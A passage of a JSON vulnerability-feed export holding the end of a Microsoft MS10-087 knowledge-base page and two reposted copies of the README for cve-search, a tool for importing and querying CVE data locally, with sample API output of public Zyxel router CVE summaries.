class=\"text-base\">Known issues in security update 2289169:</span></div><ul class=\"sbody-free_list\"><li>After you install this security update, you may not be able to view or insert certain image files into Microsoft Office documents. For more information about this issue, click the following article number to view the article in the Microsoft Knowledge Base:\u00a0 <br/><br/> <br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2479871\" id=\"kb-link-13\">2479871 </a> Security settings for graphic filters for Microsoft Office 2010, the 2007 Microsoft Office system, Microsoft Office 2003, and Microsoft Office XP</div></li><li>After you install this security update, you may have to accept the Microsoft Software License Terms when you start a Microsoft Office XP program. If you do not accept the Microsoft Software License Terms, the Office XP program may not start.</li></ul></li><li><a href=\"2454823\" id=\"kb-link-14\" target=\"_self\">2454823</a> Description of the Microsoft Office for Mac 2011 14.0.1 Update </li></ul></div></body></html>", "edition": 2, "modified": "2014-06-21T14:34:09", "id": "KB2423930", "href": "https://support.microsoft.com/en-us/help/2423930/", "published": "2014-06-21T14:34:09", "title": "MS10-087: Vulnerabilities in Microsoft Office could allow remote code execution", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "n0where": [{"lastseen": "2019-05-29T18:37:16", "bulletinFamily": "tools", "cvelist": ["CVE-2013-3588", "CVE-2008-1255", "CVE-2014-4162", "CVE-2012-4341", "CVE-2008-1257", "CVE-2008-1256", "CVE-2010-3333", "CVE-2008-1254", "CVE-2013-6786"], "description": "cve-search is a tool to import CVE (Common Vulnerabilities and Exposures) and CPE (Common Platform Enumeration) into a MongoDB to facilitate search and processing of CVEs. \n\nThe main objective of the software is to avoid doing direct and public lookup into the public CVE databases. This is usually faster to do local lookups and limits your sensitive queries via the Internet. \n\ncve-search includes a back-end to store vulnerabilities and related information, an intuitive web interface for search and managing vulnerabilities, a series of tools to query the system and a web API interface. \n\ncve-search is used by many organizations including the [ public CVE services of CIRCL ](<https://cve.circl.lu/>) . \n\n* * *\n\n## Requirements \n\n * Python3.3 or later \n * MongoDB 2.2 or later \n * redis server \n * Pip3 \n * PyMongo \n * Flask \n * Flask-PyMongo \n * Flask-Login \n * Tornado \n * Whoosh \n * Redis \n * Python-dateutil \n * passlib \n * feedformater (for RSS and Atom dump_last) [ http://code.google.com/p/feedformatter/ ](<http://code.google.com/p/feedformatter/>)\n * Whoosh [ http://packages.python.org/Whoosh/ ](<http://packages.python.org/Whoosh/>) (If you\u2019re planning to use the Full-text indexer) \n * irc \n * sleekxmpp \n * Werkzeug \n * Jinja2 \n * itsdangerous \n * click \n\nThe requirements can be installed with pip: \n \n \n sudo pip3 install -r requirements.txt\r\n \n\n## Installation of MongoDB \n\nFirst, you\u2019ll need to have a Python 3 installation (3.3 or higher). Then you need to install MongoDB (2.2) from source (this should also work with any standard packages from your favorite distribution). Don\u2019t forget to install the headers for development while installing MongoDB. You can go to [ http://docs.mongodb.org/manual/installation/ ](<http://docs.mongodb.org/manual/installation/>) for to get the packages for your distribution, or [ http://www.mongodb.org/downloads ](<http://www.mongodb.org/downloads>) for the source code. \n\n## Populating the database \n\nFor the initial run, you need to populate the CVE database by running: \n \n \n ./sbin/db_mgmt.py -p\r\n ./sbin/db_mgmt_cpe_dictionary.py\r\n ./sbin/db_updater.py -c\r\n \n\nIt will fetch all the existing XML files from the Common Vulnerabilities and Exposures database and the Common Platform Enumeration. The initial Common Platform Enumeration (CPE) import might take some time depending of your configuration. \n\nIf you want to add the cross-references from NIST, Red Hat and other vendors: \n \n \n ./sbin/db_mgmt_ref.py\r\n \n\nA more detailed documentation can be found in the Documentations folder of the project. \n\n## Databases and collections \n\nThe MongoDB database is called cvedb and there are 11 collections: \n\n * cves (Common Vulnerabilities and Exposure items) \u2013 source NVD NIST \n * cpe (Common Platform Enumeration items) \u2013 source NVD NIST \n * cwe (Common Weakness Enumeration items) \u2013 source NVD NIST \n * capec (Common Attack Pattern Enumeration and Classification) \u2013 source NVD NIST \n * ranking (ranking rules per group) \u2013 local cve-search \n * d2sec (Exploitation reference from D2 Elliot Web Exploitation Framework) \u2013 source d2sec.com \n * [ MITRE Reference Key/Maps ](<https://cve.mitre.org/data/refs/>) \u2013 source MITRE reference Key/Maps \n * ms \u2013 (Microsoft Bulletin (Security Vulnerabilities and Bulletin)) \u2013 source [ Microsoft ](<http://www.microsoft.com/en-us/download/details.aspx?id=36982>)\n * exploitdb (Offensive Security \u2013 Exploit Database) \u2013 source [ offensive security ](<https://github.com/offensive-security/exploit-database>)\n * info (metadata of each collection like last-modified) \u2013 local cve-search \n * via4 [ VIA4CVE ](<https://github.com/cve-search/VIA4CVE>) cross-references. \n\nThe Redis database has 3 databases: \n\n * 10: The cpe (Common Platform Enumeration) cache \u2013 source MongoDB cvedb collection cpe \n * 11: The notification database \u2013 source cve-search \n * 12: The [ CVE reference database ](<https://cve.mitre.org/data/refs/>) is a cross-reference database to CVE ids against various vendors ID \u2013 source NVD NIST/MITRE \n\nThe reference database has 3 additional sources: \n\n * [ MITRE Reference Key/Maps ](<https://cve.mitre.org/data/refs/>) . \n * Red Hat RPM to CVE database. \n * Red Hat RHSA Oval database. \n\n## Updating the database \n\nAn updater script helps to start the db_mgmt_* \n \n \n ./sbin/db_updater.py -v\r\n \n\nYou can run it in a crontab, logging is done in syslog by default. \n\n## Repopulating the database \n\nTo easily drop and re-populate all the databases \n \n \n ./sbin/db_updater.py -v -f\r\n \n\nThis will drop all the existing external sources and reimport everything. This operation can take some time and it\u2019s usually only required when new attributes parsing are added in cve-search. \n\n## Usage \n\nYou can search the database using search.py \n \n \n ./bin/search.py -p cisco:ios:12.4\r\n ./bin/search.py -p cisco:ios:12.4 -o json\r\n ./bin/search.py -f nagios -n\r\n ./bin/search.py -p microsoft:windows_7 -o html\r\n \n\nIf you want to search all the WebEx vulnerabilities and only printing the official references from the supplier. \n \n \n ./bin/search.py -p webex: -o csv -v \"cisco\"\r\n \n\nYou can also dump the JSON for a specific CVE ID. \n \n \n ./bin/search.py -c CVE-2010-3333\r\n \n\nOr you can use the XMPP bot \n \n \n ./bin/search_xmpp.py -j mybot@jabber.org -p strongpassword\r\n \n\nOr dump the last 2 CVE entries in RSS or Atom format \n \n \n ./bin/dump_last.py -f atom -l 2\r\n \n\nOr you can use the webinterface. \n \n \n ./web/index.py\r\n \n\n## Usage of the ranking database \n\nThere is a ranking database allowing to rank software vulnerabilities based on their common platform enumeration name. The ranking can be done per organization or department within your organization or any meaningful name for you. \n\nAs an example, you can add a partial CPE name like \u201csap:netweaver\u201d which is very critical for your accounting department. \n \n \n ./sbin/db_ranking.py -c \"sap:netweaver\" -g \"accounting\" -r 3\r\n \n\nand then you can lookup the ranking (-r option) for a specific CVE-ID: \n \n \n ./bin/search.py -c CVE-2012-4341 -r -n\r\n \n\n## Advanced usage \n\nAs cve-search is based on a set of tools, it can be used and combined with standard Unix tools. If you ever wonder what are the top vendors using the term \u201cunknown\u201d for their vulnerabilities: \n \n \n python3 bin/search_fulltext.py -q unknown -f | jq -c '. | .vulnerable_configuration[0]' | cut -f5 -d: | sort | uniq -c | sort -nr | head -10\r\n \r\n 1500 oracle\r\n 381 sun\r\n 372 hp\r\n 232 google\r\n 208 ibm\r\n 126 mozilla\r\n 103 microsoft\r\n 100 adobe\r\n 78 apple\r\n 68 linux\r\n \n\nYou can compare CVSS (Common Vulnerability Scoring System ) values of some products based on their CPE name. Like comparing oracle:java versus sun:jre and using R to make some statistics about their CVSS values: \n \n \n python3 bin/search.py -p oracle:java -o json | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file(\"stdin\"))[,1]))'\r\n Min. 1st Qu. Median Mean 3rd Qu. Max.\r\n 1.800 5.350 9.300 7.832 10.000 10.000\r\n \r\n \r\n python3 bin/search.py -p sun:jre -o json | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file(\"stdin\"))[,1]))'\r\n Min. 1st Qu. Median Mean 3rd Qu. Max.\r\n 0.000 5.000 7.500 7.333 10.000 10.000\r\n \n\n## Fulltext indexing \n\nIf you want to index all the CVEs from your current MongoDB collection: \n \n \n ./sbin/db_fulltext.py\r\n \n\nand you query the fulltext index (to get a list of matching CVE-ID): \n \n \n ./bin/search_fulltext.py -q NFS -q Linux\r\n \n\nor to query the fulltext index and output the JSON object for each CVE-ID: \n \n \n ./bin/search_fulltext.py -q NFS -q Linux -f\r\n \n\n## Fulltext visualization \n\nThe fulltext indexer visualization is using the fulltext indexes to build a list of the most common keywords used in CVE. [ NLTK ](<http://nltk.org/>) is required to generate the keywords with the most common English stopwords and lemmatize the output. [ NTLK for Python 3 ](<http://nltk.org/nltk3-alpha/>) exists but you need to use the alpha version of NLTK. \n \n \n ./bin/search_fulltext.py -g -s >cve.json\r\n \n\nYou can see a visualization on the [ demo site ](<http://www.foo.be/cve/>) . \n\n## Web interface \n\nThe web interface is a minimal interface to see the last CVE entries and query a specific CVE. You\u2019ll need flask in order to run the website and [ Flask-PyMongo ](<http://flask-pymongo.readthedocs.org/en/latest/>) . To start the web interface: \n \n \n cd ./web\r\n ./index.py\r\n \n\nThen you can connect on [ http://127.0.0.1:5000/ ](<http://127.0.0.1:5000/>) to browser the last CVE. \n\n## Web API interface \n\nThe web interface includes a minimal JSON API to get CVE by ID, by vendor or product. A public version of the API is also accessible on [ cve.circl.lu ](<https://cve.circl.lu/>) . \n\nList the know vendors in JSON \n \n \n curl http://127.0.0.1:5000/api/browse/\r\n \n\nDump the product of a specific vendor in JSON \n \n \n curl http://127.0.0.1:5000/api/browse/zyxel \r\n {\r\n \"product\": [\r\n \"n300_netusb_nbg-419n\",\r\n \"n300_netusb_nbg-419n_firmware\",\r\n \"p-660h-61\",\r\n \"p-660h-63\",\r\n \"p-660h-67\",\r\n \"p-660h-d1\",\r\n \"p-660h-d3\",\r\n \"p-660h-t1\",\r\n \"p-660h-t3\",\r\n \"p-660hw\",\r\n \"p-660hw_d1\",\r\n \"p-660hw_d3\",\r\n \"p-660hw_t3\"\r\n ],\r\n \"vendor\": \"zyxel\"\r\n }\r\n \n\nFind the associated vulnerabilities to a vendor and a product \n \n \n curl http://127.0.0.1:5000/api/search/zyxel/p-660hw\r\n [{\"cwe\": \"CWE-352\", \"references\": [\"http://www.exploit-db.com/exploits/33518\", \"http://secunia.com/advisories/58513\", \"http://packetstormsecurity.com/files/126812/Zyxel-P-660HW-T1-Cross-Site-Request-Forgery.html\", \"http://osvdb.org/show/osvdb/107449\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw:_t1:v3\"], \"Published\": \"2014-06-16T14:55:09.713-04:00\", \"id\": \"CVE-2014-4162\", \"Modified\": \"2014-07-17T01:07:29.683-04:00\", \"cvss\": 6.8, \"summary\": \"Multiple cross-site request forgery (CSRF) vulnerabilities in the Zyxel P-660HW-T1 (v3) wireless router allow remote attackers to hijack the authentication of administrators for requests that change the (1) wifi password or (2) SSID via a request to Forms/WLAN_General_1.\"}, {\"cwe\": \"CWE-20\", \"references\": [\"http://www.kb.cert.org/vuls/id/893726\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660h-63:-\", \"cpe:/h:zyxel:p-660h-t1:-\", \"cpe:/h:zyxel:p-660h-d3:-\", \"cpe:/h:zyxel:p-660h-t3:v2\", \"cpe:/h:zyxel:p-660h-t1:v2\", \"cpe:/h:zyxel:p-660h-d1:-\", \"cpe:/h:zyxel:p-660h-67:-\", \"cpe:/h:zyxel:p-660h-61:-\", \"cpe:/h:zyxel:p-660hw_t3:v2\", \"cpe:/h:zyxel:p-660hw_t3:-\", \"cpe:/h:zyxel:p-660hw_d3:-\", \"cpe:/h:zyxel:p-660hw_d1:v2\", \"cpe:/h:zyxel:p-660hw_d1:-\", \"cpe:/h:zyxel:p-660hw:_t1:v2\", \"cpe:/h:zyxel:p-660hw:_t1:-\"], \"Published\": \"2014-04-01T23:58:16.967-04:00\", \"id\": \"CVE-2013-3588\", \"Modified\": \"2014-04-02T11:29:53.243-04:00\", \"cvss\": 7.8, \"summary\": \"The web management interface on Zyxel P660 devices allows remote attackers to cause a denial of service (reboot) via a flood of TCP SYN packets.\"}, {\"cwe\": \"CWE-79\", \"references\": [\"http://osvdb.org/ref/99/rompager407.pdf\", \"http://osvdb.org/99694\", \"http://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf\"], \"vulnerable_configuration\": [\"cpe:/h:d-link:dsl-2640r:-\", \"cpe:/h:d-link:dsl-2641r:-\", \"cpe:/h:huawei:mt882:-\", \"cpe:/h:sitecom:wl-174:-\", \"cpe:/h:tp-link:td-8816:-\", \"cpe:/a:allegrosoft:rompager:4.07\", \"cpe:/h:zyxel:p-660hw_d1:-\"], \"Published\": \"2014-01-16T14:55:04.607-05:00\", \"id\": \"CVE-2013-6786\", \"Modified\": \"2014-01-17T11:01:47.353-05:00\", \"cvss\": 4.3, \"summary\": \"Cross-site scripting (XSS) vulnerability in Allegro RomPager before 4.51, as used on the ZyXEL P660HW-D1, Huawei MT882, Sitecom WL-174, TP-LINK TD-8816, and D-Link DSL-2640R and DSL-2641R, when the \\\"forbidden author header\\\" protection mechanism is bypassed, allows remote attackers to inject arbitrary web script or HTML by requesting a nonexistent URI in conjunction with a crafted HTTP Referer header that is not properly handled in a 404 page. NOTE: there is no CVE for a \\\"URL redirection\\\" issue that some sources list separately.\"}, {\"cwe\": \"CWE-79\", \"references\": [\"http://xforce.iss.net/xforce/xfdb/41109\", \"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw_t3:v2\", \"cpe:/h:zyxel:p-660hw:_t1:v2\", \"cpe:/h:zyxel:p-660hw_d1:v2\", \"cpe:/h:zyxel:p-660hw_t3:-\", \"cpe:/h:zyxel:p-660hw:_t1:-\", \"cpe:/h:zyxel:p-660hw_d3:-\", \"cpe:/h:zyxel:p-660hw_d1:-\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"id\": \"CVE-2008-1257\", \"Modified\": \"2012-05-31T00:00:00.000-04:00\", \"cvss\": 4.3, \"summary\": \"Cross-site scripting (XSS) vulnerability in Forms/DiagGeneral_2 on the ZyXEL P-660HW series router allows remote attackers to inject arbitrary web script or HTML via the PingIPAddr parameter.\"}, {\"id\": \"CVE-2008-1256\", \"references\": [\"http://xforce.iss.net/xforce/xfdb/41108\", \"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"Modified\": \"2011-03-07T22:06:25.080-05:00\", \"cvss\": 10.0, \"summary\": \"The ZyXEL P-660HW series router has \\\"admin\\\" as its default password, which allows remote attackers to gain administrative access.\"}, {\"cwe\": \"CWE-264\", \"references\": [\"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\", \"http://xforce.iss.net/xforce/xfdb/41114\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"id\": \"CVE-2008-1255\", \"Modified\": \"2008-09-05T17:37:15.440-04:00\", \"cvss\": 10.0, \"summary\": \"The ZyXEL P-660HW series router maintains authentication state by IP address, which allows remote attackers to bypass authentication by establishing a session from a source IP address of a previously authenticated user.\"}, {\"cwe\": \"CWE-352\", \"references\": [\"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\", \"http://xforce.iss.net/xforce/xfdb/41111\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"id\": \"CVE-2008-1254\", \"Modified\": \"2008-09-05T17:37:15.287-04:00\", \"cvss\": 6.8, \"summary\": \"Multiple cross-site request forgery (CSRF) vulnerabilities on the ZyXEL P-660HW series router allow remote attackers to (1) change DNS servers and (2) add keywords to the \\\"bannedlist\\\" via unspecified vectors.\"}]\r\n \n\n[  ](<https://github.com/cve-search/cve-search>)\n", "edition": 4, "modified": "2017-10-30T00:56:57", "published": "2017-10-30T00:56:57", "id": "N0WHERE:172361", "href": "https://n0where.net/perform-local-searches-for-known-vulnerabilities-cve-search", "title": "Perform Local Searches For Known Vulnerabilities: cve-search", "type": "n0where", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2021-01-16T05:33:23", "bulletinFamily": "tools", "cvelist": ["CVE-2013-3588", "CVE-2008-1255", "CVE-2014-4162", "CVE-2012-4341", "CVE-2008-1257", "CVE-2008-1256", "CVE-2010-3333", "CVE-2008-1254", "CVE-2013-6786"], "description": "[  ](<https://2.bp.blogspot.com/-uP7vVDtJ5KI/WeBO05vuO-I/AAAAAAAAJIk/BTHzH_HwfHkbE_QJOdidzgSfixaib4PRwCLcBGAs/s1600/cve-search.png>)\n\n \n\n\n \n\n\ncve-search is a tool to import CVE (Common Vulnerabilities and Exposures) and CPE (Common Platform Enumeration) into a [ MongoDB ](<https://www.kitploit.com/search/label/MongoDB>) to facilitate search and processing of CVEs. \n\nThe main objective of the software is to avoid doing direct and public lookup into the public CVE databases. This is usually faster to do local lookups and limits your sensitive queries via the Internet. \n\ncve-search includes a back-end to store [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) and related information, an intuitive web interface for search and managing vulnerabilities, a series of tools to query the system and a web API interface. \n\ncve-search is used by many organizations including the [ public CVE services of CIRCL ](<https://cve.circl.lu/>) . \n\n \n** Requirements ** \n\n\n * Python3.3 or later \n * MongoDB 2.2 or later \n * redis server \n * Pip3 \n * PyMongo \n * Flask \n * Flask-PyMongo \n * Flask-Login \n * Tornado \n * Whoosh \n * Redis \n * Python-dateutil \n * passlib \n * feedformater (for RSS and Atom dump_last) [ http://code.google.com/p/feedformatter/ ](<https://code.google.com/p/feedformatter/>)\n * Whoosh [ http://packages.python.org/Whoosh/ ](<https://packages.python.org/Whoosh/>) (If you're planning to use the Full-text indexer) \n * irc \n * sleekxmpp \n * Werkzeug \n * Jinja2 \n * itsdangerous \n * click \nThe requirements can be installed with pip: \n\n \n \n sudo pip3 install -r requirements.txt\n\n \n** Installation of MongoDB ** \nFirst, you'll need to have a Python 3 installation (3.3 or higher). Then you need to install [ MongoDB ](<https://www.kitploit.com/search/label/MongoDB>) (2.2) from source (this should also work with any standard packages from your favorite distribution). Don't forget to install the headers for development while installing MongoDB. You can go to [ http://docs.mongodb.org/manual/installation/ ](<http://docs.mongodb.org/manual/installation/>) for to get the packages for your distribution, or [ http://www.mongodb.org/downloads ](<https://www.mongodb.org/downloads>) for the source code. \n \n** Populating the database ** \nFor the initial run, you need to populate the CVE database by running: \n\n \n \n ./sbin/db_mgmt.py -p\n ./sbin/db_mgmt_cpe_dictionary.py\n ./sbin/db_updater.py -c\n\nIt will fetch all the existing XML files from the Common Vulnerabilities and Exposures database and the Common Platform Enumeration. The initial Common Platform [ Enumeration ](<https://www.kitploit.com/search/label/Enumeration>) (CPE) import might take some time depending of your configuration. \nIf you want to add the cross-references from NIST, Red Hat and other vendors: \n\n \n \n ./sbin/db_mgmt_ref.py\n\nA more detailed documentation can be found in the Documentations folder of the project. \n \n** Databases and collections ** \nThe [ MongoDB ](<https://www.kitploit.com/search/label/MongoDB>) database is called cvedb and there are 11 collections: \n\n\n * cves (Common Vulnerabilities and Exposure items) - source NVD NIST \n * cpe (Common Platform [ Enumeration ](<https://www.kitploit.com/search/label/Enumeration>) items) - source NVD NIST \n * cwe (Common Weakness [ Enumeration ](<https://www.kitploit.com/search/label/Enumeration>) items) - source NVD NIST \n * capec (Common Attack Pattern [ Enumeration ](<https://www.kitploit.com/search/label/Enumeration>) and Classification) - source NVD NIST \n * ranking (ranking rules per group) - local cve-search \n * d2sec (Exploitation reference from D2 Elliot Web Exploitation Framework) - source d2sec.com \n * [ MITRE Reference Key/Maps ](<https://cve.mitre.org/data/refs/>) \\- source MITRE reference Key/Maps \n * ms - (Microsoft Bulletin (Security Vulnerabilities and Bulletin)) - source [ Microsoft ](<https://www.microsoft.com/en-us/download/details.aspx?id=36982>)\n * exploitdb (Offensive Security - Exploit Database) - source [ offensive security ](<https://github.com/offensive-security/exploit-database>)\n * info (metadata of each collection like last-modified) - local cve-search \n * via4 [ VIA4CVE ](<https://github.com/cve-search/VIA4CVE>) cross-references. \nThe Redis database has 3 databases: \n\n\n * 10: The cpe (Common Platform Enumeration) cache - source [ MongoDB ](<https://www.kitploit.com/search/label/MongoDB>) cvedb collection cpe \n * 11: The notification database - source cve-search \n * 12: The [ CVE reference database ](<https://cve.mitre.org/data/refs/>) is a cross-reference database to CVE ids against various vendors ID - source NVD NIST/MITRE \nThe reference database has 3 additional sources: \n\n\n * [ MITRE Reference Key/Maps ](<https://cve.mitre.org/data/refs/>) . \n * Red Hat RPM to CVE database. \n * Red Hat RHSA Oval database. \n \n** Updating the database ** \nAn updater script helps to start the db_mgmt_* \n\n \n \n ./sbin/db_updater.py -v\n\nYou can run it in a crontab, logging is done in syslog by default. \n \n** Repopulating the database ** \nTo easily drop and re-populate all the databases \n\n \n \n ./sbin/db_updater.py -v -f\n\nThis will drop all the existing external sources and reimport everything. This operation can take some time and it's usually only required when new attributes parsing are added in cve-search. \n \n** Usage ** \nYou can search the database using search.py \n\n \n \n ./bin/search.py -p cisco:ios:12.4\n ./bin/search.py -p cisco:ios:12.4 -o json\n ./bin/search.py -f nagios -n\n ./bin/search.py -p microsoft:windows_7 -o html\n\nIf you want to search all the WebEx [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) and only printing the official references from the supplier. \n\n \n \n ./bin/search.py -p webex: -o csv -v \"cisco\"\n\nYou can also dump the JSON for a specific CVE ID. \n\n \n \n ./bin/search.py -c CVE-2010-3333\n\nOr you can use the XMPP bot \n\n \n \n ./bin/search_xmpp.py -j [email\u00a0protected] -p strongpassword\n\nOr dump the last 2 CVE entries in RSS or Atom format \n\n \n \n ./bin/dump_last.py -f atom -l 2\n\nOr you can use the webinterface. \n\n \n \n ./web/index.py\n\n \n** Usage of the ranking database ** \nThere is a ranking database allowing to rank software [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) based on their common platform enumeration name. The ranking can be done per organization or department within your organization or any meaningful name for you. \nAs an example, you can add a partial CPE name like \"sap:netweaver\" which is very critical for your accounting department. \n\n \n \n ./sbin/db_ranking.py -c \"sap:netweaver\" -g \"accounting\" -r 3\n\nand then you can lookup the ranking (-r option) for a specific CVE-ID: \n\n \n \n ./bin/search.py -c CVE-2012-4341 -r -n\n\n \n** Advanced usage ** \nAs cve-search is based on a set of tools, it can be used and combined with standard Unix tools. If you ever wonder what are the top vendors using the term \"unknown\" for their vulnerabilities: \n\n \n \n python3 bin/search_fulltext.py -q unknown -f | jq -c '. | .vulnerable_configuration[0]' | cut -f5 -d: | sort | uniq -c | sort -nr | head -10\n \n 1500 oracle\n 381 sun\n 372 hp\n 232 google\n 208 ibm\n 126 mozilla\n 103 microsoft\n 100 adobe\n 78 apple\n 68 linux\n\nYou can compare CVSS (Common Vulnerability Scoring System ) values of some products based on their CPE name. Like comparing oracle:java versus sun:jre and using R to make some statistics about their CVSS values: \n\n \n \n python3 bin/search.py -p oracle:java -o json | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file(\"stdin\"))[,1]))'\n Min. 1st Qu. Median Mean 3rd Qu. Max.\n 1.800 5.350 9.300 7.832 10.000 10.000\n \n \n python3 bin/search.py -p sun:jre -o json | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file(\"stdin\"))[,1]))'\n Min. 1st Qu. Median Mean 3rd Qu. Max.\n 0.000 5.000 7.500 7.333 10.000 10.000\n\n \n** Fulltext indexing ** \nIf you want to index all the CVEs from your current [ MongoDB ](<https://www.kitploit.com/search/label/MongoDB>) collection: \n\n \n \n ./sbin/db_fulltext.py\n\nand you query the fulltext index (to get a list of matching CVE-ID): \n\n \n \n ./bin/search_fulltext.py -q NFS -q Linux\n\nor to query the fulltext index and output the JSON object for each CVE-ID: \n\n \n \n ./bin/search_fulltext.py -q NFS -q Linux -f\n\n \n** Fulltext visualization ** \nThe fulltext indexer visualization is using the fulltext indexes to build a list of the most common keywords used in CVE. [ NLTK ](<http://nltk.org/>) is required to generate the keywords with the most common English stopwords and lemmatize the output. [ NTLK for Python 3 ](<http://nltk.org/nltk3-alpha/>) exists but you need to use the alpha version of NLTK. \n\n \n \n ./bin/search_fulltext.py -g -s >cve.json\n\n \n \n\n\n[  ](<https://3.bp.blogspot.com/-19Gg5xq3jO8/WeBPKtozgLI/AAAAAAAAJIo/OYURDvJ9vE8apT5nF7vHidtD16gnpAcFQCLcBGAs/s1600/cve-search.jpg>)\n\nYou can see a visualization on the [ demo site ](<http://www.foo.be/cve/>) . \n \n** Web interface ** \nThe web interface is a minimal interface to see the last CVE entries and query a specific CVE. You'll need flask in order to run the website and [ Flask-PyMongo ](<https://flask-pymongo.readthedocs.org/en/latest/>) . To start the web interface: \n\n \n \n cd ./web\n ./index.py\n\nThen you can connect on [ http://127.0.0.1:5000/ ](<http://127.0.0.1:5000/>) to browser the last CVE. \n \n** Web API interface ** \nThe web interface includes a minimal JSON API to get CVE by ID, by vendor or product. A public version of the API is also accessible on [ cve.circl.lu ](<https://cve.circl.lu/>) . \nList the know vendors in JSON \n\n \n \n curl http://127.0.0.1:5000/api/browse/\n\nDump the product of a specific vendor in JSON \n\n \n \n curl http://127.0.0.1:5000/api/browse/zyxel \n {\n \"product\": [\n \"n300_netusb_nbg-419n\",\n \"n300_netusb_nbg-419n_firmware\",\n \"p-660h-61\",\n \"p-660h-63\",\n \"p-660h-67\",\n \"p-660h-d1\",\n \"p-660h-d3\",\n \"p-660h-t1\",\n \"p-660h-t3\",\n \"p-660hw\",\n \"p-660hw_d1\",\n \"p-660hw_d3\",\n \"p-660hw_t3\"\n ],\n \"vendor\": \"zyxel\"\n }\n\nFind the associated [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) to a vendor and a product \n\n \n \n curl http://127.0.0.1:5000/api/search/zyxel/p-660hw\n [{\"cwe\": \"CWE-352\", \"references\": [\"http://www.exploit-db.com/exploits/33518\", \"http://secunia.com/advisories/58513\", \"http://packetstormsecurity.com/files/126812/Zyxel-P-660HW-T1-Cross-Site-Request-Forgery.html\", \"http://osvdb.org/show/osvdb/107449\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw:_t1:v3\"], \"Published\": \"2014-06-16T14:55:09.713-04:00\", \"id\": \"CVE-2014-4162\", \"Modified\": \"2014-07-17T01:07:29.683-04:00\", \"cvss\": 6.8, \"summary\": \"Multiple cross-site request forgery (CSRF) [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) in the Zyxel P-660HW-T1 (v3) [wireless](<https://www.kitploit.com/search/label/Wireless>) router allow remote attackers to hijack the authentication of administrators for requests that change the (1) wifi password or (2) SSID via a request to Forms/WLAN_General_1.\"}, {\"cwe\": \"CWE-20\", \"references\": [\"http://www.kb.cert.org/vuls/id/893726\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660h-63:-\", \"cpe:/h:zyxel:p-660h-t1:-\", \"cpe:/h:zyxel:p-660h-d3:-\", \"cpe:/h:zyxel:p-660h-t3:v2\", \"cpe:/h:zyxel:p-660h-t1:v2\", \"cpe:/h:zyxel:p-660h-d1:-\", \"cpe:/h:zyxel:p-660h-67:-\", \"cpe:/h:zyxel:p-660h-61:-\", \"cpe:/h:zyxel:p-660hw_t3:v2\", \"cpe:/h:zyxel:p-660hw_t3:-\", \"cpe:/h:zyxel:p-660hw_d3:-\", \"cpe:/h:zyxel:p-660hw_d1:v2\", \"cpe:/h:zyxel:p-660hw_d1:-\", \"cpe:/h:zyxel:p-660hw:_t1:v2\", \"cpe:/h:zyxel:p-660hw:_t1:-\"], \"Published\": \"2014-04-01T23:58:16.967-04:00\", \"id\": \"CVE-2013-3588\", \"Modified\": \"2014-04-02T11:29:53.243-04:00\", \"cvss\": 7.8, \"summary\": \"The web management interface on Zyxel P660 devices allows remote attackers to cause a [denial of service](<https://www.kitploit.com/search/label/Denial%20of%20Service>) (reboot) via a flood of TCP SYN packets.\"}, {\"cwe\": \"CWE-79\", \"references\": [\"http://osvdb.org/ref/99/rompager407.pdf\", \"http://osvdb.org/99694\", \"http://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf\"], \"vulnerable_configuration\": [\"cpe:/h:d-link:dsl-2640r:-\", \"cpe:/h:d-link:dsl-2641r:-\", \"cpe:/h:huawei:mt882:-\", \"cpe:/h:sitecom:wl-174:-\", \"cpe:/h:tp-link:td-8816:-\", \"cpe:/a:allegrosoft:rompager:4.07\", \"cpe:/h:zyxel:p-660hw_d1:-\"], \"Published\": \"2014-01-16T14:55:04.607-05:00\", \"id\": \"CVE-2013-6786\", \"Modified\": \"2014-01-17T11:01:47.353-05:00\", \"cvss\": 4.3, \"summary\": \"Cross-site scripting (XSS) vulnerability in Allegro RomPager before 4.51, as used on the ZyXEL P660HW-D1, Huawei MT882, Sitecom WL-174, TP-LINK TD-8816, and D-Link DSL-2640R and DSL-2641R, when the \\\"forbidden author header\\\" protection mechanism is bypassed, allows remote attackers to inject arbitrary web script or HTML by requesting a nonexistent URI in conjunction with a crafted HTTP Referer header that is not properly handled in a 404 page. NOTE: there is no CVE for a \\\"URL redirection\\\" issue that some sources list separately.\"}, {\"cwe\": \"CWE-79\", \"references\": 